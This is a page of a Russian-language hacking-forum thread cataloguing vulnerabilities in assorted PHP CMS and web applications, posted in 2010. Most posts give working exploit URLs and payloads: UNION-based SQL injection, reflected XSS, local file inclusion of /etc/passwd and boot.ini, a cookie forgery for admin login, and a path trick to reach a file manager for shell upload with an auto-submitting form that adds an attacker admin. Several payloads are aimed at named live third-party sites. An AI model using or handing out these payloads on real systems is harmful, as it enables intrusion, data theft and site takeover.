ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу Энциклопедия уязвимых скриптов
   
Ответ
Страница 31 из 41 « Первая < 21 27 28 29 30 31 32 33 34 35 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #301  
Старый 11.01.2010, 00:19
Аватар для Twin $park
Twin $park
Новичок
Регистрация: 15.11.2009
Сообщений: 8
Провел на форуме:
31294

Репутация: 79
По умолчанию
Corporate Merchandise Solution

скрипт коммерческий,однако cms фактически не являеться

Blind SQL inj

пример:

Цитата:
http://demo.mycorporatestores.com/catalog.php?categoryID=31+and+substring(@@version, 1,1)=3
WR-Board
v 1.5>

XSS

Цитата:
index.php?fid=XSS&id=
(с) Twin $park
Последний раз редактировалось Twin $park; 11.01.2010 в 00:21..
 
Ответить с цитированием

  #302  
Старый 18.01.2010, 01:40
Аватар для nikp
nikp
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386

Репутация: 1463
По умолчанию
cms pragmaMx 0.1.11
http://www.pragmamx.org/Downloads-op-view-lid-731.html

dork: "This Website based on pragmaMx"

Passive XSS
уязвимы параметры newlang, name, op, query, show_all,orderby, min, cid, id
http://localhost/html/index.php?newlang=1>"><script>alert(121212);</script>
http://localhost/html/index.php?newlang=1>"><script>alert(121212)%3B</script>
http://localhost/html/modules.php?name=1>"><script>alert(121212)%3B</script>
http://localhost/html/modules.php?name=nnn&newlang=1>"><script>alert(121 212)%3B</script>
http://localhost/html/modules.php?name=nnn&op=NewLinks&query=1>"><script >alert(121221)%3B</script>&min=0&orderby=dateD
http://localhost/html/modules.php?name=nnn&show_all=1>"><script>alert(12 1212)%3B</script>
http://localhost/html/modules.php?name=nnn&op=AddEntry&query=111&min=0&o rderby=1%22'%3E%3Cscript%3Ealert(121212)%3B%3C/script%3E
http://localhost/html/modules.php?name=nnnt&min=1%3E%22%3E%3Cscript%3Eal ert(121212)%3B%3C/script%3E&orderby=dateD&cid=0
http://localhost/html/modules.php?name=nnn&rop=showcontent&id=1%3E%22%3E %3Cscript%3Ealert(121212)%3B%3C/script%3E

SQL
права админа

admin/modules/banners.php
PHP код:
function bannerdelete($bid$ok 0)
{
    global $prefix$bgcolor2$bgcolor3$script;
    if (!empty($ok)) {
        if ($ok == 1) {
        }
        sql_query("delete from " $prefix "_banner where bid='$bid'");
        header("Location: admin.php?op=banneradmin#top");
    } else {
        include("header.php");
        GraphicAdmin();
        OpenTable();
        echo "<center><font class=\"title\"><b>" _BANNERSADMIN "</b></font><br /><br />";
        echo "<a href=\"admin.php?op=banneradmin\">" _BACKTO " " _ADMINMENU "</a></center>";
        CloseTable();
        echo '<br />';
        $result sql_query("select bid,imptotal,impmade,clicks,imageurl,clickurl,alttext,script,active,typ from " $prefix "_banner where bid=$bid");
        list($bid$imptotal$impmade$clicks$imageurl$clickurl$alttext$script$active$typ) = sql_fetch_row($result); 
http://localhost/html/admin.php?op=bannerdelete&bid=-1+union+select+1,version(),3,4,5,6,7,8,9,10+--+&ok=0



PHP код:
function banneredit($bid)
{
    global $prefix;
    include("header.php");
    GraphicAdmin();
    OpenTable();
    echo "<center><font class=\"title\"><b>" _BANNERSADMIN "</b></font><br /><br />";
    echo "<a href=\"admin.php?op=banneradmin\">" _BACKTO " " _ADMINMENU "</a></center>";
    CloseTable();
    echo '<br />';
    $result sql_query("select cid, imptotal, impmade, clicks, imageurl, clickurl, alttext, script, typ, active from " $prefix "_banner where bid=$bid"); 
http://localhost/html/admin.php?op=banneredit&bid=-1+union+select+1,2,3,4,version(),6,7,8,9,10+--+&ok=0



PHP код:
function bannerclientdelete($cid$ok 0)
{
    global $prefix$bid$cid$impmade$clicks$imageurl$alttext$bdate$typ$script;
    if (!empty($ok)) {
        if ($ok == 1) {
            sql_query("delete from " $prefix "_banner where cid='$cid'");
            sql_query("delete from " $prefix "_bannerclient where cid='$cid'");
        }
        header("Location: admin.php?op=banneradmin#top");
    } else {
        include("header.php");
        GraphicAdmin();
        OpenTable();
        echo "<center><font class=\"title\"><b>" _BANNERSADMIN "</b></font><br /><br />";
        echo "<a href=\"admin.php?op=banneradmin\">" _BACKTO " " _ADMINMENU "</a></center>";
        CloseTable();
        echo '<br />';
        OpenTableAl();
        $result2 sql_query("select bid,cid,impmade,clicks,imageurl,clickurl,alttext,datestart,typ,script from " $prefix "_banner where cid=$cid"); 
http://localhost/html/admin.php?op=bannerclientdelete&cid=-1+union+select+1,2,3,4,5,6,7,8,9,version()+--+



PHP код:
function bannerclientedit($cid)
{
    global $prefix;
    include("header.php");
    GraphicAdmin();
    OpenTable();
    echo "<div align=\"center\"><font class=\"title\"><b>" _BANNERSADMIN "</b></font><br /><br />";
    echo "<a href=\"admin.php?op=banneradmin\">" _BACKTO " " _ADMINMENU "</a></div>";
    CloseTable();
    echo '<br />';
    $result sql_query("select name, contact, email, login, passwd, extrainfo from " $prefix "_bannerclient where cid=$cid");
    list($name$contact$email$login$passwd$extrainfo) = sql_fetch_row($result); 
http://localhost/html/admin.php?op=bannerclientedit&cid=-1+union+select+1,version(),3,4,5,6+--+


==================


Обновилась версия CMS до
PragmaMX 0.1.12

В ней добавлен новый модуль - osc2pragmaMX, это уже известная osCommerce Online Merchant v2.2 RC2a.
Соответсвенно появилаь уязвимость:

catalog/admin/includes/application_top.php
PHP код:
...
// redirect to login page if administrator is not yet logged in
  if (!tep_session_is_registered('admin')) {
    if (isset($_COOKIE['admin'])){
      $bridge_admin $_COOKIE['admin'];
      $bridge_admin_login false;
      if (!is_array($bridge_admin)) {
          $bridge_admin base64_decode($bridge_admin);
          $bridge_admin addslashes($bridge_admin);
          $bridge_admin explode(":"$bridge_admin);
      }
      $bridge_adminid $bridge_admin[0];
      $bridge_adminpwd $bridge_admin[1];
      $bridge_adminid substr(addslashes($bridge_adminid), 025);
      if (!empty($bridge_adminid) && !empty($bridge_adminpwd)) {
        $sql "SELECT pwd FROM ".$prefix."_authors WHERE aid='$bridge_adminid'";
        $result tep_db_query($sql);
        $pass tep_db_fetch_array($result);
        
        if ($pass['pwd'] == $bridge_adminpwd && !empty($pass['pwd'])){
            tep_session_register('admin');
        }
      }
    }else{
    $redirect false;

    $current_page basename($PHP_SELF);

    if ($current_page != FILENAME_LOGIN) {
      if (!tep_session_is_registered('redirect_origin')) {
        tep_session_register('redirect_origin');

        $redirect_origin = array('page' => $current_page,
                                 'get' => $HTTP_GET_VARS);
      }

      $redirect true;
    }

    if ($redirect == true) {
      tep_redirect(tep_href_link(FILENAME_LOGIN));
    }

    unset($redirect);
   } 
уязвимость находится в строках
PHP код:
   $current_page basename($PHP_SELF);

    if ($current_page != FILENAME_LOGIN) { 
С точки зрения обычного (если он не посещает antichat.ru) программиста это безупречная проверка, но конструкция
admin/any_file.php/login.php проходит эту проверку, а на выполнение подается any_file.php.

Заливка шелла

запускаем файловый менеджер
http://demo.osc2pragmamx.org/modules/catalog/admin/file_manager.php/login.php

не забываем добавлять к УРЛу login.php

новый файл
http://demo.osc2pragmamx.org/modules/catalog/admin/file_manager.php/login.php?action=new_file


Добавляем себя в админы.

AddAdm.html
PHP код:
<form method="post" action="http://demo.osc2pragmamx.org/modules/catalog/admin/administrators.php/login.php?action=insert">
<input type=hidden name="username" value="as" />
<input type=hidden name="password" value="123123" />
<input type=hidden name="x" value="16" />
<input type=hidden name="y" value="13" />
</form>
<script>document.getElementsByTagName("form")[0].submit();</script
Уязвимость работает, даже если модуль не подключен, поскольку для запуска используем не CMS,
а путь до скрипта http:/site.com/path_cms/modules/catalog/admin/any_file.php
Последний раз редактировалось nikp; 19.01.2010 в 13:20..
 
Ответить с цитированием

  #303  
Старый 20.01.2010, 14:33
Аватар для v1d0qz
v1d0qz
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074

Репутация: 257
По умолчанию
Дабы не копировать по 5 раз. Лучше дам просто ссылку на пост, надеюсь так можно. Там 1 движок News Edit, а второй что-то похожее на движек, просто компания делает сайты все как один, потому это тоже можно назвать движком
http://forum.antichat.ru/threadedpost1839460.html#post1839460
Последний раз редактировалось v1d0qz; 23.01.2010 в 05:13..
 
Ответить с цитированием

  #304  
Старый 21.01.2010, 21:01
Аватар для nikp
nikp
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386

Репутация: 1463
По умолчанию
cms awcm v2_1 final
http://sourceforge.net/projects/awcm/

header.php
PHP код:
if(isset($_GET['id'])) {
$gid $_GET['id'];
if(!is_numeric($gid) OR $gid == "") { exit; }
}
if(isset($_GET['pm'])) {
$gpm $_GET['pm'];
if(eregi("'",$gpm) OR eregi("SELECT",$gpm) OR eregi("union",$gpm) OR eregi("delete",$gpm) OR eregi("table",$gpm) OR eregi("member",$gpm) OR eregi("update",$gpm) OR eregi('admin',$gpm) OR $gpm == "") { exit; }
}
if(isset($_GET['search'])) {
$gsearch $_GET['search'];
if(eregi("'",$gsearch)) { exit; }
}

....

if(isset($_COOKIE['awcm_theme'])) {
    $theme_file $_COOKIE['awcm_theme'];
} else {
    $theme_file $mysql_maininfo_row['defult_theme'];
}

if(isset($_COOKIE['awcm_lang'])) {
    $lang_file $_COOKIE['awcm_lang'];
} else {
    $lang_file $mysql_maininfo_row['defult_language'];
}
@include ("themes/$theme_file/settings.php");
include ("common.php");

@include ("languages/$lang_file");

$member_cok $_COOKIE['awcm_member']-197;
if(isset($_SESSION['awcm_member'])) {
    $member $_SESSION['awcm_member'];
} elseif (isset($_COOKIE['awcm_member'])) {
    $mysql_checkdookie51_member_query mysql_query("SELECT password,id FROM awcm_members WHERE id = '$member_cok'");
    $mysql_checkdookie51_member_row   mysql_fetch_array($mysql_checkdookie51_member_query);
    $mysql_checkdookie51_member_total mysql_num_rows($mysql_checkdookie51_member_query);
    if ($mysql_checkdookie51_member_total 0) {
        $member $mysql_checkdookie51_member_row['id'];
        $_SESSION['awcm_member'] = $mysql_checkdookie51_member_row['id'];
    }
} else {
    $member 'no';

LFI
mq=off
http://localhost/awcm/header.php
cookies
awcm_theme=../../../../../../../../etc/passwd%00

LFI
http://localhost/awcm/header.php
cookies
awcm_lang=../../../../../../../../etc/passwd

Заходим админом
http://localhost/awcm/index.php
cookies
awcm_member=198

-----------------------
include/avatar.php
PHP код:
include ("../connect.php");
$gh $_GET['h'];
$gw $_GET['w'];
$gid $_GET['id'];
$mysql_query mysql_query("SELECT id,avatar FROM awcm_members WHERE id = '$gid'");
$mysql_total mysql_num_rows($mysql_query);
$mysql_row   mysql_fetch_array($mysql_query);

if($mysql_total == 1) {
    if($mysql_row['avatar'] == "") {
    print '<img src="../images/no_avatar.jpg"  height="'.$gh.'" width="'.$gw.'" />';
    } else {
    print '<img src="'.$mysql_row['avatar'].'" height="'.$gh.'" width="'.$gw.'" />';
    }
} else {
    print '<img src="../images/no_avatar.jpg"  height="'.$gh.'" width="'.$gw.'" />';

Passive XSS
mq=off
http://localhost/awcm/includes/avatar.php?h=1>"><SCRiPt>alert(1212);</SCRiPt>
http://localhost/awcm/includes/avatar.php?w=1>"><SCRiPt>alert(1212);</SCRiPt>

SQL
mq=off
http://localhost/awcm/includes/avatar.php?id=1'+and+1=2+union+select+1,version()+--+

-----------------------
includes/show_vid_title.php
PHP код:
include ("../connect.php");
$gid $_GET['id'];
$mysql_show_vid_title_php_query mysql_query("SELECT id,title FROM awcm_videos_videos WHERE id = '$gid'");
$mysql_show_vid_title_php_row   mysql_fetch_array($mysql_show_vid_title_php_query);

print $mysql_show_vid_title_php_row['title']; 
SQL
mq=off
http://localhost/awcm/includes/show_vid_title.php?id=-1'+union+select+1,version()+--+

===============
RulleR
Цитата:
а через параметры 'pm' и 'search' нельзя провести инъекцию? вижу функцию eregi(), а она воспринимает null byte за конец строки...
можно
member_cp_pm.php
PHP код:
include ("header.php");
...
if(isset($_GET['pm'])) {
$mysql_mmbrcppmviewpmpg_query mysql_query("SELECT * FROM awcm_member_pms WHERE hash = '$_GET[pm]' AND reciever = '$member' OR hash = '$_GET[pm]' AND sender = '$member'"); 
SQL
mq=off
http://localhost/awcm/member_cp_pm.php?pm=%00'+union+select+1,2,3,versio n(),5,6,7;+--+
Последний раз редактировалось nikp; 21.01.2010 в 22:28..
 
Ответить с цитированием

  #305  
Старый 22.01.2010, 23:38
Аватар для nikp
nikp
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386

Репутация: 1463
По умолчанию
SmartyCMS
http://sunet.dl.sourceforge.net/project/smartycms/smartycms/0.9.4 build 334/smartycms-0.9.4-334.zip

Passive XSS
http://localhost/smartycms-0.9.4-334/index.php?page=tutorial&cmsUserRole=1>'><script>al ert(121212);</script>

----------------

js/tiny_mce/plugins/ibrowser/scripts/loadmsg.php
PHP код:
$l = (isset($_REQUEST['lang']) ? new PLUG_Lang($_REQUEST['lang']) : new PLUG_Lang($cfg['lang']));
$l->setBlock('ibrowser'); 
js/tiny_mce/plugins/ibrowser/langs/lang.class.php
PHP код:
function setBlock$value ) {
$this -> block $value;

function getLang() {
$this -> lang $value;

function loadData() {
global $cfg;
include( dirname(__FILE__) . '/' $this -> lang.'.php' ); 
LFI
mq=off
http://localhost/smartycms-0.9.4-334/js/tiny_mce/plugins/ibrowser/scripts/loadmsg.php?lang=../../../../../../../../../../boot.ini%00
аналогично
http://localhost/smartycms-0.9.4-334/js/tiny_mce/plugins/ibrowser/scripts/rfiles.php?lang=../../../../../../../../../../boot.ini%00
http://localhost/smartycms-0.9.4-334/js/tiny_mce/plugins/ibrowser/scripts/symbols.php?lang=../../../../../../../../../../boot.ini%00

----------------

config/smartycms.config.php
PHP код:
// url request param name for template call
$smartycms['config']['PageCallParamName'] = 'page'
libraries/smarty-cms/Smarty_cms.php
PHP код:
        // read default template name from given url param
        if (!$resource_name && !empty($smartycms['config']['PageCallParamName']))
          if ( !empty($_REQUEST[$smartycms['config']['PageCallParamName']]) )
          {
            $page $_REQUEST[$smartycms['config']['PageCallParamName']];
            $ext  strrchr($page'.'); 

            if($ext !== false$resource_name substr($page0, -strlen($ext)); else $resource_name $page;
            
            $resource_name .= '.'.$smartycms['config']['TemplateFileExtension'];
          } 
libraries/smarty/Smarty.class.php
PHP код:
        if ($display && !$this->caching && count($this->_plugins['outputfilter']) == 0) {
            if ($this->_is_compiled($resource_name$_smarty_compile_path)
                    || $this->_compile_resource($resource_name$_smarty_compile_path))
            {
                include($_smarty_compile_path);
            } 
LFI
mq=off
http://localhost/smartycms-0.9.4-334/index.php?page=/boot.ini%00.html

----------------
templates/handler/book_content_handler.php
PHP код:
  function book_content_handler($params, &$smarty)
  {
    global $smartycms;
    // create individual chapter id
    if (!$_GET['chapterid'] || $_GET['chapterid']=="1"$chapterid=time(); else $chapterid=$_GET['chapterid'];
    
    // send content to template
    $smarty->assign("chapterid",$chapterid);
    $smarty->assign("book_chapter_id","book_chapter_".$chapterid);
    $smarty->assign("book_content_id","book_content_".$chapterid);
  } 
templates/tutorial.tpl
PHP код:
{* Tutorial content block *}
{include file="modules/book_content.tpl" pid="smartycms_tutorial"}<br
templates/modules/book_content.tpl
PHP код:
{if $smarty.request.chapterid}
<a name="start"></a>
<div class="cms_book_headline">{cms id="$book_chapter_idtheme="singleline" pid=$pid title="edit chapter headline"}Please insert here the chapter headline{/cms}</div><br>
{cms id="$book_content_idpid=$pid title="edit chapter content" height="250" smartytags="0"}<div class="cms_book_bodytext">Please insert here the chapter content</div>{/cms}<br><br>
{/if} 
view source
http://localhost/smartycms-0.9.4-334/index.php?page=tutorial&chapterid=../../../../../../../../../../boot.ini
http://localhost/smartycms-0.9.4-334/index.php?page=tutorial&chapterid=../../../../../index.php
 
Ответить с цитированием

  #306  
Старый 02.02.2010, 22:10
Аватар для nikp
nikp
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386

Репутация: 1463
По умолчанию
cms sabros.us
http://sourceforge.net/projects/sabrosus/files/latest

pXSS
http://localhost/sabrosus/index.php?busqueda=1<ScRiPt >alert(1212);</ScRiPt>
http://localhost/sabrosus/index.php?tag=1>"><ScRiPt>alert(1212);</ScRiPt>

------------

atom.php
PHP код:
if (isset($_GET["tag"])) {
    $navegador strtolower$_SERVER['HTTP_USER_AGENT'] );
    if (stristr($navegador"opera") || stristr($navegador"msie")) {
        $tagtag utf8_decode($_GET["tag"]);
    } else {
        $tagtag $_GET["tag"];
    }
}

$sqlStr "SELECT DISTINCT link.* FROM ".$prefix."sabrosus as link, ".$prefix."tags as tag, ".$prefix."linktags as rel WHERE";

if(isset($tagtag)){
    $sqlStr .= " (tag.tag LIKE '$tagtag') AND ";
}

$sqlStr .= " (tag.id = rel.tag_id AND rel.link_id = link.id_enlace) AND link.privado = 0 ORDER BY link.fecha DESC";

if(isset($cuantos)){
    if($cuantos!='todos' && is_numeric($cuantos)){
        $sqlStr .= " LIMIT $cuantos";
    }
    if($cuantos!='todos' && !is_numeric($cuantos)){
        $sqlStr .= " LIMIT 10";
    }
} else {
    $sqlStr .= " LIMIT 10";
}
$result mysql_query($sqlStr,$link); 
SQL
mq=off
http://localhost/sabrosus/atom.php?tag=')+union+select+1,version(),3,4,5,6+--+
User-Agent=111
 
Ответить с цитированием

  #307  
Старый 03.02.2010, 14:18
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию
Croogo 1.2
(Геморная маленько)
Пассивная XSS
/admin/filemanager/browse?path=%22%3E%3Cscript%3Ealert();%3C/script%3E
Сработает на админе если он авторизированный.

ps
Залить шелл легко (Права админа нужны)
/admin/attachments
Там я думаю догадаетесь.
Последний раз редактировалось Ctacok; 03.02.2010 в 14:20..
 
Ответить с цитированием

  #308  
Старый 03.02.2010, 23:13
Аватар для nikp
nikp
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386

Репутация: 1463
По умолчанию
Imer - Site Manager 3.5.0
sourceforge.net/projects/ism-imersiteman/

path disclosure
http://localhost/imer/help/admin_common.php

--------------

divcliente.php
PHP код:
require_once './conecta.php';
require_once './suporte.php';
require_once './arrays.php';
if ($oplcat == '2'){
    if ($ople == 'E'){
        $pg_usuario mysql_query("SELECT * FROM swb_usuarios WHERE ID = $idl LIMIT 1"); 
SQL
rg=on
http://localhost/imer/divcliente.php?oplcat=2&ople=E&idl=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,version(),34,35,36,37,38,39,40,41,42,43+--+
http://www.trudelmer.com.br/imer/divcliente.php?oplcat=2&ople=E&idl=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,version(),34,35,36,37,38,39,40,41,42,43+--+

--------------

noticia.php
PHP код:
$pg_noticias mysql_query("SELECT * FROM swb_noticias WHERE status = 'A' AND ID = $idl LIMIT 1"); 
SQL
rg=on
http://localhost/imer/noticia.php?conf_empresa=2&user=1&idl=-3+union+select+1,2,version(),4,5,6,7,8,9,10,11,12--
http://www.trudelmer.com.br/imer/noticia.php?conf_empresa=2&user=1&idl=-3+union+select+1,2,version(),4,5,6,7,8,9,10,11,12--

--------------

divhelp.php
PHP код:
require_once './conecta.php';
require_once './suporte.php';
require_once './arrays.php';
if ($oplhlp == 'Y' || $oplhlp == 'N' || $oplhlp == 'R' || $oplhlp == 'L'){
    if ($ople == 'E'){
        $pg_userhelp mysql_query("SELECT * FROM livehelp_users WHERE username = '$login' LIMIT 1"); 
SQL
rg=on
mq=off
http://localhost/imer/divhelp.php?oplhlp=Y&ople=E&&login=hhhh'+union+sel ect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27,28,29,version(),31,32,33 ,34,35,36,37,38,39,40+limit+1+--+
 
Ответить с цитированием

  #309  
Старый 04.02.2010, 01:06
Аватар для MaSTeR GэN
MaSTeR GэN
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110

Репутация: 133
Отправить сообщение для MaSTeR GэN с помощью ICQ
По умолчанию
PHP - STATS
текущая версия 0.1.9.2
сайт: php-stats.com
фаил : downloads.php
условия magic_quotes_gpc = off
уязвимый код :

PHP код:
$result=sql_query("SELECT nome,descrizione,type,home,size,downloads,withinterface FROM $option[prefix]_downloads WHERE id='$id'");
..............................................................................................................
if(($mode!='download' && $downloads_withinterface=='YES') || $errorDownload===true)
    {
         .......................................... 
                  else {а вот собственно тут уже и имеем вывод на экран}
   { 

использование :
Код:
http://localhost/php-stats/download.php?mode=downloadd&id=999999'+union+select+1,2,2,3,4,5,"YES"+from+information_schema.tables%23
Пример для сайта производителей:
Код:
http://php-stats.com/stat/download.php?mode=downloadd&id=999999'+union+select+1,version(),2,3,4,5,"YES"%23
P.S 6й столбец должен быть обезательно задан как "YES" иначе не будет вывода
 
Ответить с цитированием

  #310  
Старый 04.02.2010, 20:34
Аватар для nikp
nikp
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386

Репутация: 1463
По умолчанию
GAzie - Gestione Aziendale v4.0.13
http://sourceforge.net/projects/gazie/

Finance application written in PHP using a MySql database backend for small to medium enterprise.
It lets you write invoices, manage stock, manage orders , accounting, etc.
Send tax receipt to electronic cash register.

pXSS
http://localhost/gazie/modules/root/login_admin.php
post
Login=1>'><script>alert(1212)</script>
Password=111111
actionflag=Login

----------------

modules/root/login_admin.php
PHP код:
if (isset ($_POST['actionflag'])) {
    // checkUser();
    $result gaz_dbi_get_row ($gTables['admin'], "Login"$_POST['Login']);
    if (!empty ($result['lang'])){
          $lang $result['lang'];
    } else {
          $lang 'italian';
    }
    require("./lang.".$lang.".php"); 
library/include/mysql.lib.php
PHP код:
function gaz_dbi_get_row$table$fnm$fval)
{
    global $link;
    $result mysql_query("SELECT * FROM $table WHERE $fnm = '$fval'"$link);
    if (!$result) die (" Error gaz_dbi_get_row: ".mysql_error());
    return mysql_fetch_array$result);

SQL+LFI
mq=off
http://localhost/gazie/modules/root/login_admin.php
post
Login=111'+union+select+1,2,3,"../../../../../../../../../../boot.ini%00",5,6,7,8,9,10,11,12,13+--+
Password=111111
actionflag=Login
 
Ответить с цитированием
Ответ
Страница 31 из 41 « Первая < 21 27 28 29 30 31 32 33 34 35 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30
Основные методы взлома и защиты скриптов на Php DIAgen Авторские статьи 8 28.05.2006 12:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ